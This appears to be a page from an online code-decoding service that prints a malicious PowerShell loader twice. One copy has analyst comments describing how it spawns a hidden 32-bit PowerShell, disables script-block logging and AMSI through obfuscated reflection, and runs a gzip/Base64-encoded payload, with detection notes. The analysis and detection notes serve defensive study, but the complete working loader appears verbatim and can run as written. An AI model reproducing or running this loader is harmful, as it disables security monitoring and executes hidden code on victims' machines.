PHP Decode
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else..
Decoded Output download
<? powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c $i1qTe=((''{3}na''+''{0}l''+''e{2}c''+''riptBlo''+''c{1}Log''+''ging'')-f''b'',''k'',''S'',''E''); $fEc=((''Sc{2}''+''ip''+''t{0}''+''loc''+''k{1}ogging'')-f''B'',''L'',''r'');If($PSVersionTable.PSVersion.Major -ge 3){ $xEAk0=[Collections.Generic.Dictionary[string,System.Object]]::new(); $d8cp2=[Ref].Assembly.GetType(((''S{5}stem.{0}''+''ana{1}emen''+''t.''+''{''+''3}{''+''2}tom''+''a''+''tion.{4}tils'')-f''M'',''g'',''u'',''A'',''U'',''y'')); $foB=((''{''+''2}''+''na{''+''4''+''}leScr''+''i{1}tB''+''l''+''oc{0}In{3}ocation{5}ogging'')-f''k'',''p'',''E'',''v'',''b'',''L''); $ah=$d8cp2.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); $kFOx=[Ref].Assembly.GetType(((''{3''+''}{1}{9''+''}t''+''em.{''+''5}ana''+''{''+''4}''+''ement.{7''+''}{6}t{8}ma''+''t''+''i''+''{8}n.{7''+''}''+''m{9''+''}i''+''{''+''0''+''}ti{''+''2}''+''{''+''9}'')-f''U'',''y'',''l'',''S'',''g'',''M'',''u'',''A'',''o'',''s'')); if ($kFOx) { $kFOx.GetField(((''a{4}si{0''+''}{3''+''}''+''i''+''{2}''+''F''+''ai{1''+''}e''+''d'')-f''I'',''l'',''t'',''n'',''m''),''NonPublic,Static'').SetValue($null,$true); }; If ($ah) { $p64=$ah.GetValue($null); If($p64[$fEc]){ $p64[$fEc][$i1qTe]=0; $p64[$fEc][$foB]=0; } $xEAk0.Add($i1qTe,0); $xEAk0.Add($foB,0); $p64[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$fEc]=$xEAk0; } Else { [Ref].Assembly.GetType(((''''+''S{3''+''}st''+''em.{2}an''+''a''+''gem''+''ent.A{5''+''}tomation.Script{1}{4}oc''+''{0}'')-f''k'',''B'',''M'',''y'',''l'',''u'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAJmVHWQCA7VW+2/aSBD+vVL/B6tCwqgEm0fzkird2oRHEoiBAAGKqsVe2{1}vWXmIvIaTX//1msR0SNenlTqolkn3Mz''+''M5+883MuuvQFpSHCiXKj48flPSzcIQDRc09jKe9opK7740K+83c7aH/XfmqqDO0''+''WtV5gGk4Pz0111FEQpHMS00iUByTYMEoidWC8rcy9klEDq4Wt8QWyg8l973UZHyBW''+''Sq2NbHtE+UAhY7cu+Q2ln6VBitGhZr/9i1fmB2U56WzuzVmsZofbGNBgpLDWL6g/CzIA6+3K6LmO9SOeM{1}dUR''+''rTsFopDcMYu6QL1u5JhwifO3EeLrO/TkTEOgqTW0kziZCah6EVcRs5TkTiOF9UZvKA2Xz+lzpLT++vQ0EDUmqHgkR8NSDRPbVJXGrh0GGkT9w5aA1ERENvX''+''iiA2D1fEjUXrhkrKv/FjNolmwy79yqpz5VAyhJRoQg{1}feWeHe6sGUk08684uuNBAb6UC4DfTwmhm7FnRTvm1SsE2i9k32y3Q8Bn1eI{1}3Wl/VfSi0oHTseDRFqa562hNCvMn{1}JWce3l5rBffa66c6YLmLYWF2YhTZ75Xf0GAnL8RUuZtNteJS0NS34''+''Y4oHZGWPW1oBCXkR0kpUysC+6p+XSDOHXCiIeFhFly4{1}e1s4CKJ11jTZlDImRDYGPwCmJeeOl''+''MEjk13w47JADwkjmQNedCmpBMOk2NbXa6nINQ3mQ4jouKtYY8tYvKgGBGnKKCwpimW2gt+G6Y37vbWTNBbRyLzNy88BLN9FSTh7GI1jZE''+''FRC4H''+''qyITTGTgBSVFnWIsR1QLzs9/yocJmYMsgcs3UM4YEXCMBCSK5FTTHlRKA2IaAcrRgIQ2tWNBsMeVIk0SXbswh5{1}8q87mqVCwnsJTIbIMzch2gPGRVEZ0UhAEZIg39L/58Ov1Uc6Y0YkjY2aZdjM2AqZAbnoUFI0BWgHRyQAikbEAwPH5LCWlBn1k3ZFLQTfpB2yjnO+pOX2Bn4d+A077rEldB''+''7Qapt3bDO2mo1jRDfe{1}j7uIts5d8jJYFQTg7O2MC3U6lHdqPm2oV/DeNgW7WZbTNqode3bTLfOlg9aLdbppjWWthIbdq3W''+''utFRtVq7qupLwG5Cy94SOd2Abh4uYQz19OrSaMeG3mZn52Z/Ma40pmPW0moN3{1}3zeHA4qWuaduLgemeLkMGdamd7U+7z65YdGLWQaydmbYnOEDLDs1H''+''D4BcTI0KW''+''NsLeipte59ENPBMZDZuSaW/YMHq9hoGGzdu7+onmaSfjG+wb41GFTlc3fR/mjU2rd6HptbZDHvl0A8A1OcJeH2Q8s2L7LsjUPyPjc5fHFbw0ODJApjG''+''9Q01/smpYDPavh{1}WORq{1}7g9''+''HldNvQtPLEqqGWzsdND/VAHHtGD6P4vv5Y18ojhzvjL''+''92Jq41u2JFWN3uWfyPvrK0C+XfTql/Y0/LGvjqqGfqdGdCALSqOdjI8NsLNhWfde05vfNR/6G4XcO5Q00afgC6zIQ1FtTLPeYvVoi9r6scPObt59Iw2b7WMDo5iHzOgE/SCLKcbPGqk5d3iVGqoKjwSli''+''QKCYO+Cp03ywTEGLdlb0naADS2pN3I7jds77{1}6bVRQngQL+6aTLZ2eTsFJSK/osHRJQk/4Rf2hquvQKvQHvbZLovdfzOSrrQqmirLVSFgSw2{1}n''+''GG{1}RV1HVP40TPCcE1LXfIPUWaHD0EuoQFMakOkjoDM7Zc+CSWz3RYA8b4FWGW8/kQyJhB+gfkDslJ2Sbfd62c/{1}LdP4nGZOWOB/+Of/KmP3ab3bf{1}S''+''K9uEPnl9WXC8+aw{1}8DYIyp
ALkB1GpGksfDG''+''zikSfIswDI4kARu+slX9dVaHHThlbZrF/8A{1}/GzY80LAAA{0}'')-f''='',''x'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" ?>
Original Code
# Analysis notes for the command line below (the sample itself is unchanged).
#
# Outer stage
#   powershell.exe is started with -nop -w hidden -noni. The script tests [IntPtr]::Size: when the
#   current process is not 32-bit (size 4) it selects the powershell.exe under %windir%\syswow64,
#   then launches it through System.Diagnostics.ProcessStartInfo as a hidden child process
#   (UseShellExecute=$false, CreateNoWindow=$true, WindowStyle='Hidden', stdout redirected).
#   The "Decoded Output" rendition on this page prints that path as 'WindowsPowerShell1.0'
#   (the '\v' was lost); the path in this copy is the intact one.
#
# Inner stage (the -c argument of the child)
#   Sensitive names are assembled at run time with the -f format operator, so they do not appear
#   as plain literals in the command line:
#     $i1qTe -> EnableScriptBlockLogging
#     $fEc   -> ScriptBlockLogging
#     $foB   -> EnableScriptBlockInvocationLogging
#     $d8cp2 -> type System.Management.Automation.Utils
#     $kFOx  -> type System.Management.Automation.AmsiUtils, field amsiInitFailed
#   On PowerShell 3 or later the script reads the NonPublic static field cachedGroupPolicySettings
#   by reflection and writes 0 for both logging values into that in-memory object, under the key
#   'HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'.
#   No registry cmdlet or API call is visible here, so the change appears limited to the child
#   process. amsiInitFailed is set to $true in the same process. If the cached-settings field is
#   not found, the 'signatures' field of System.Management.Automation.ScriptBlock is replaced
#   with an empty HashSet[string] instead.
#
# Payload
#   A Base64 string with two placeholders ({0} -> '=', {1} -> 'x') is decoded, decompressed with
#   GzipStream and executed through [scriptblock]::Create. The decompressed script is not shown
#   on this page, so its behaviour is not described here.
#
# Detection and hardening notes
#   - The logging and AMSI changes run inside the child before the payload executes, so
#     process-creation telemetry with full command lines (Security event 4688 with command-line
#     auditing, or Sysmon event 1) is the dependable source for this sample.
#   - Strings that stay in clear text in the command line: '-nop -w hidden -noni',
#     'syswow64\WindowsPowerShell\v1.0\powershell.exe', 'cachedGroupPolicySettings',
#     '[Ref].Assembly.GetType', 'FromBase64String', 'GzipStream', '[scriptblock]::create'.
#     A powershell.exe parent spawning the syswow64 powershell.exe with a hidden window is a
#     useful correlation.
#   - NOTE(review): Constrained Language Mode enforced by application control should block the
#     reflection calls used here -- confirm in the target environment.
powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c $i1qTe=((''{3}na''+''{0}l''+''e{2}c''+''riptBlo''+''c{1}Log''+''ging'')-f''b'',''k'',''S'',''E''); $fEc=((''Sc{2}''+''ip''+''t{0}''+''loc''+''k{1}ogging'')-f''B'',''L'',''r'');If($PSVersionTable.PSVersion.Major -ge 3){ $xEAk0=[Collections.Generic.Dictionary[string,System.Object]]::new(); $d8cp2=[Ref].Assembly.GetType(((''S{5}stem.{0}''+''ana{1}emen''+''t.''+''{''+''3}{''+''2}tom''+''a''+''tion.{4}tils'')-f''M'',''g'',''u'',''A'',''U'',''y'')); $foB=((''{''+''2}''+''na{''+''4''+''}leScr''+''i{1}tB''+''l''+''oc{0}In{3}ocation{5}ogging'')-f''k'',''p'',''E'',''v'',''b'',''L''); $ah=$d8cp2.GetField(''cachedGroupPolicySettings'',''NonPublic,Static''); $kFOx=[Ref].Assembly.GetType(((''{3''+''}{1}{9''+''}t''+''em.{''+''5}ana''+''{''+''4}''+''ement.{7''+''}{6}t{8}ma''+''t''+''i''+''{8}n.{7''+''}''+''m{9''+''}i''+''{''+''0''+''}ti{''+''2}''+''{''+''9}'')-f''U'',''y'',''l'',''S'',''g'',''M'',''u'',''A'',''o'',''s'')); if ($kFOx) { $kFOx.GetField(((''a{4}si{0''+''}{3''+''}''+''i''+''{2}''+''F''+''ai{1''+''}e''+''d'')-f''I'',''l'',''t'',''n'',''m''),''NonPublic,Static'').SetValue($null,$true); }; If ($ah) { $p64=$ah.GetValue($null); If($p64[$fEc]){ $p64[$fEc][$i1qTe]=0; $p64[$fEc][$foB]=0; } $xEAk0.Add($i1qTe,0); $xEAk0.Add($foB,0); $p64[''HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\''+$fEc]=$xEAk0; } Else { [Ref].Assembly.GetType(((''''+''S{3''+''}st''+''em.{2}an''+''a''+''gem''+''ent.A{5''+''}tomation.Script{1}{4}oc''+''{0}'')-f''k'',''B'',''M'',''y'',''l'',''u'')).GetField(''signatures'',''NonPublic,Static'').SetValue($null,(New-Object Collections.Generic.HashSet[string])); }};&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String(((''H4sIAJmVHWQCA7VW+2/aSBD+vVL/B6tCwqgEm0fzkird2oRHEoiBAAGKqsVe2{1}vWXmIvIaTX//1msR0SNenlTqolkn3Mz''+''M5+883MuuvQFpSHCiXKj48flPSzcIQDRc09jKe9opK7740K+83c7aH/XfmqqDO0''+''WtV5gGk4Pz0111FEQpHMS00iUByTYMEoidWC8rcy9klEDq4Wt8QWyg8l973UZHyBW''+''Sq2NbHtE+UAhY7cu+Q2ln6VBitGhZr/9i1fmB2U56WzuzVmsZofbGNBgpLDWL6g/CzIA6+3K6LmO9SOeM{1}dUR''+''rTsFopDcMYu6QL1u5JhwifO3EeLrO/TkTEOgqTW0kziZCah6EVcRs5TkTiOF9UZvKA2Xz+lzpLT++vQ0EDUmqHgkR8NSDRPbVJXGrh0GGkT9w5aA1ERENvX''+''iiA2D1fEjUXrhkrKv/FjNolmwy79yqpz5VAyhJRoQg{1}feWeHe6sGUk08684uuNBAb6UC4DfTwmhm7FnRTvm1SsE2i9k32y3Q8Bn1eI{1}3Wl/VfSi0oHTseDRFqa562hNCvMn{1}JWce3l5rBffa66c6YLmLYWF2YhTZ75Xf0GAnL8RUuZtNteJS0NS34''+''Y4oHZGWPW1oBCXkR0kpUysC+6p+XSDOHXCiIeFhFly4{1}e1s4CKJ11jTZlDImRDYGPwCmJeeOl''+''MEjk13w47JADwkjmQNedCmpBMOk2NbXa6nINQ3mQ4jouKtYY8tYvKgGBGnKKCwpimW2gt+G6Y37vbWTNBbRyLzNy88BLN9FSTh7GI1jZE''+''FRC4H''+''qyITTGTgBSVFnWIsR1QLzs9/yocJmYMsgcs3UM4YEXCMBCSK5FTTHlRKA2IaAcrRgIQ2tWNBsMeVIk0SXbswh5{1}8q87mqVCwnsJTIbIMzch2gPGRVEZ0UhAEZIg39L/58Ov1Uc6Y0YkjY2aZdjM2AqZAbnoUFI0BWgHRyQAikbEAwPH5LCWlBn1k3ZFLQTfpB2yjnO+pOX2Bn4d+A077rEldB''+''7Qapt3bDO2mo1jRDfe{1}j7uIts5d8jJYFQTg7O2MC3U6lHdqPm2oV/DeNgW7WZbTNqode3bTLfOlg9aLdbppjWWthIbdq3W''+''utFRtVq7qupLwG5Cy94SOd2Abh4uYQz19OrSaMeG3mZn52Z/Ma40pmPW0moN3{1}3zeHA4qWuaduLgemeLkMGdamd7U+7z65YdGLWQaydmbYnOEDLDs1H''+''D4BcTI0KW''+''NsLeipte59ENPBMZDZuSaW/YMHq9hoGGzdu7+onmaSfjG+wb41GFTlc3fR/mjU2rd6HptbZDHvl0A8A1OcJeH2Q8s2L7LsjUPyPjc5fHFbw0ODJApjG''+''9Q01/smpYDPavh{1}WORq{1}7g9''+''HldNvQtPLEqqGWzsdND/VAHHtGD6P4vv5Y18ojhzvjL''+''92Jq41u2JFWN3uWfyPvrK0C+XfTql/Y0/LGvjqqGfqdGdCALSqOdjI8NsLNhWfde05vfNR/6G4XcO5Q00afgC6zIQ1FtTLPeYvVoi9r6scPObt59Iw2b7WMDo5iHzOgE/SCLKcbPGqk5d3iVGqoKjwSli''+''QKCYO+Cp03ywTEGLdlb0naADS2pN3I7jds77{1}6bVRQngQL+6aTLZ2eTsFJSK/osHRJQk/4Rf2hquvQKvQHvbZLovdfzOSrrQqmirLVSFgSw2{1}n''+''GG{1}RV1HVP40TPCcE1LXfIPUWaHD0EuoQFMakOkjoDM7Zc+CSWz3RYA8b4FWGW8/kQyJhB+gfkDslJ2Sbfd62c/{1}LdP4nGZOWOB/+Of/KmP3ab3bf{1}S''+''K9uEPnl9WXC8+aw{1}8DYIyp
ALkB1GpGksfDG''+''zikSfIswDI4kARu+slX9dVaHHThlbZrF/8A{1}/GzY80LAAA{0}'')-f''='',''x'')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
Function Calls
None |
Stats
MD5 | cba9648a76ce244d482edccdbc6b2b2d |
Eval Count | 0 |
Decode Time | 32 ms |